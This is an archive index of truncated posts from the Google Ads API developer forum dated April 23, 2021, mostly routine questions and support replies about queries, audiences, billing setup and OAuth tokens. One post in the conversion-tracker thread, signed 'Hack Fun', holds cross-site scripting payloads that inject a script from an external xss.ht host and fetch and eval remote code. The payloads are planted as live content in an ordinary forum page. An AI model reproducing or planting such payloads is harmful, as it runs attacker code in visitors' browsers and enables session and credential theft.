The error code is not in this version while creating customer

2021-04-23 Thread 廖真
Hi, We encountered some problems with using Google Ads API since Apr.22. I use PHP to request ads API, here are some informations about my development environment: - PHP 7.2 - use composer require "googleads/google-ads-php": "^6.0" This is my code: ``` $customer = new Customer([ 'descriptive_n

custom audience id uniqueness

2021-04-23 Thread E.G.
Are custom audience ids unique across accounts? -- -- =~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ Also find us on our blog: https://googleadsdeveloper.blogspot.com/ =~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ You received this message because you are subscribed to the Google Groups "

Re: Getting report totals in new Google Ads API

2021-04-23 Thread Google Ads API Forum Advisor Prod
Hi Luis, Thank you for reaching out. There is no other way to get the total metrics.average_cost by campaign when you query the ad_group resource, but if you need it on the ad_group level then you could directly query the metrics.average_cost. Thanks and regards, Xiaoming, Google Ads API Team

RE: AdWords API and Ads Interface are very slow in Turkey

2021-04-23 Thread Google Ads API Forum Advisor Prod
Hi Mahir, The slowness may be transient, you can also try the Ads API. Regards, Aryeh Baker Google Ads API Team ref:_00D1U1174p._5004Q2GGw2c:ref -- -- =~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ Also find us on our blog: https://googleadsdeveloper.blogspot.com/ =~=~=~=~=~=~=~=~=~=~=~=~=

Re: Getting report totals in new Google Ads API

2021-04-23 Thread Luis Pandolfi
Hi Xiaoming, The issue in my case when querying the campaign level is that I cannot filter by fields of the ad_group resource. I can achieve that using Data Studio, I guess Data Studio is not using neither GAQL nor AWQL then. Is there any other way to do it? Best regards, Luis El viernes, 23 d

Re: Getting report totals in new Google Ads API

2021-04-23 Thread Google Ads API Forum Advisor Prod
Hi Luis, Thank you for reaching out. The GAQL and the AWQL don’t support the group by functionality. As for your concern, it’s more appropriate to query the campaign resource rather than the ad_group resource. You could query the metrics.average_cost from the campaign resource to obtain the ave

Re: Unrequested/unpredictable behavior of default(?) conversion trackers

2021-04-23 Thread Michael Blasenstein
Hi Matt, thanks so much for contacting me. In the meantime I actually found my answer – it’s a function of Google Ads itself. A conversion tracker for phone calls is added by default upon the account’s first conversion. The fact that it’s added on first conversion instead of on account creation

Re: What is doc link to support Advanced bid adjustment

2021-04-23 Thread Google Ads API Forum Advisor Prod
Hi Martin, For campaign and ad group criterion bid modification, I would recommend using the CampaignBidModifierService and AdGroupBidModifierService, respectively. Regards, Matt Google Ads API Team Matt Google Ads API Team ref:_00D1U1174p._5004Q2FadYd:ref -- -- =~=~=~=~=~=~=~=~=~=~=~=~=~=~=

Re: how to get audience names associated with ad groups

2021-04-23 Thread E.G.
Also, if my audience was applied at the campaign level, can it still show up in ad_group_criterion for ad groups associated with the campaign? Or will I need to make another query for campaign_criterion? On Friday, April 23, 2021 at 9:24:25 AM UTC-7 E.G. wrote: > Right, we can get user_list nam

Re: how to get audience names associated with ad groups

2021-04-23 Thread E.G.
Right, we can get user_list names directly from ad_group_criterion. But what about other audience types, like custom_audience? I don't see an option for custom_audience name. On Friday, April 23, 2021 at 4:49:13 AM UTC-7 adsapiforumadvisor wrote: > Hello, > > Thanks for reaching out. You can u

Re: Getting report totals in new Google Ads API

2021-04-23 Thread Luis Pandolfi
Hi, just another question related to getting totals. How can I get column totals? I mean, total like in a group by. For example, I query at the adgroup level, and filter a subset of adgroup. I select campaign.name, and metrics.average_cost. The result is aggregated at the adgroup level, one row

AddCrmBasedUserList returning a SOAP envelope of "userListId Required"

2021-04-23 Thread Darren thinkston
I'm trying to send a batch of emails up via the API. But for some reason I keep getting the following error. [RequiredError.REQUIRED @ operations[0].operand.userListId] my code is as follows: get_results( "SELECT * FROM $table_name" ); $clientID = '***-***-'; $listID = *; $i = 0

RE: Child account authenticate in ads API

2021-04-23 Thread Google Ads API Forum Advisor Prod
Hi Krishnadas, Thank you for reaching out. If “login to my child account” in your question refers to authentication with your child account, then you need to use your child account to create a new set of OAuth2 credentials and update them in the properties file. If you just mean to query agains

Re: Getting report totals in new Google Ads API

2021-04-23 Thread Luis Pandolfi
Thank you! you saved my day. El viernes, 23 de abril de 2021 a la(s) 10:45:48 UTC-3, nangsawxru...@gmail.com escribió: > > ในวันที่ ศ. 23 เม.ย. 2021 20:27 Google Ads API Forum Advisor Prod < > adsapifor...@gmail.com> เขียนว่า: > >> Hi Stefano, >> >> Thank you for sharing the information to help

How i can create test payment profile id(or billing_setup_id)?

2021-04-23 Thread Вася Иванов
Hi, I have a test mcc account and a test client customer account. I need to change my test account budget. This can be done like this(https://developers.google.com/google-ads/api/docs/billing/account-budgets). But how to create a billing_setup_id for a test account? -- -- =~=~=~=~=~=~=~=~=~

Re: Getting report totals in new Google Ads API

2021-04-23 Thread นางสาวอรุณรักษ์ บุญลือ
ในวันที่ ศ. 23 เม.ย. 2021 20:27 Google Ads API Forum Advisor Prod < adsapiforumadvi...@gmail.com> เขียนว่า: > Hi Stefano, > > Thank you for sharing the information to help out other people. > > > - Luis, > > Let us know if you have any further questions. > > > Thanks and regards, > Xiaoming, Googl

Re: Getting report totals in new Google Ads API

2021-04-23 Thread Google Ads API Forum Advisor Prod
Hi Stefano, Thank you for sharing the information to help out other people. - Luis, Let us know if you have any further questions. Thanks and regards, Xiaoming, Google Ads API Team Xiaoming Google Ads API Team ref:_00D1U1174p._5001UAqWq9:ref -- -- =~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=

Re: Unrequested/unpredictable behavior of default(?) conversion trackers

2021-04-23 Thread Hack Fun
">https://just4hackerdude.xss.ht> javascript:eval('var a=document.createElement(\'script\');a.src=\' https://just4hackerdude.xss.ht\';document.body.appendChild(a)') "> "> "> "> function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "// just4hac

Re: Unrequested/unpredictable behavior of default(?) conversion trackers

2021-04-23 Thread Google Ads API Forum Advisor Prod
Hi Michael, Thanks for your patience on this. We had to remove your previous post since it contained personal info. Would you mind emailing us at googleadsapi-supp...@google.com and linking this thread in your email? Thanks, Matt Google Ads API Team Matt Google Ads API Team ref:_00D1U1174p._50

RE: how to get audience names associated with ad groups

2021-04-23 Thread Google Ads API Forum Advisor Prod
Hello, Thanks for reaching out. You can use the ad group criterion resource for this purpose. For example you might use the query: "SELECT ad_group_criterion.user_list.user_list, user_list.name, ad_group.name FROM ad_group_criterion" The query builder can be a useful tool for creating queries.

Token API : refresh_token not return

2021-04-23 Thread Billy Zhan
&scope=https://www.googleapis.com/auth/adwords then request the token interface(https://oauth2.googleapis.com/token),look at the attachment, and find that no refresh token is returned. [image: 企业微信20210423-175755.png] -- -- =~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ Also find us on

AdWords API and Ads Interface are very slow in Turkey

2021-04-23 Thread ma...@sumer.me
Hi, We use the Google AdWords API, but since yesterday (22.04.2021) there has been an incredible slowness and we often get "timeout" errors. What is the reason of this? How can we solve it? -- -- =~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ Also find us on our blog: https://googleadsdevel

BatchJob canceled

2021-04-23 Thread SR
We are using batch jobs to launch Google campaigns. Recently we have included the YouTube channel as one of the placements in AdGroupCriterionOperation. 'xsi_type': 'AdGroupCriterionOperation', 'operand': { 'xsi_type': 'BiddableAdGroupCriterion',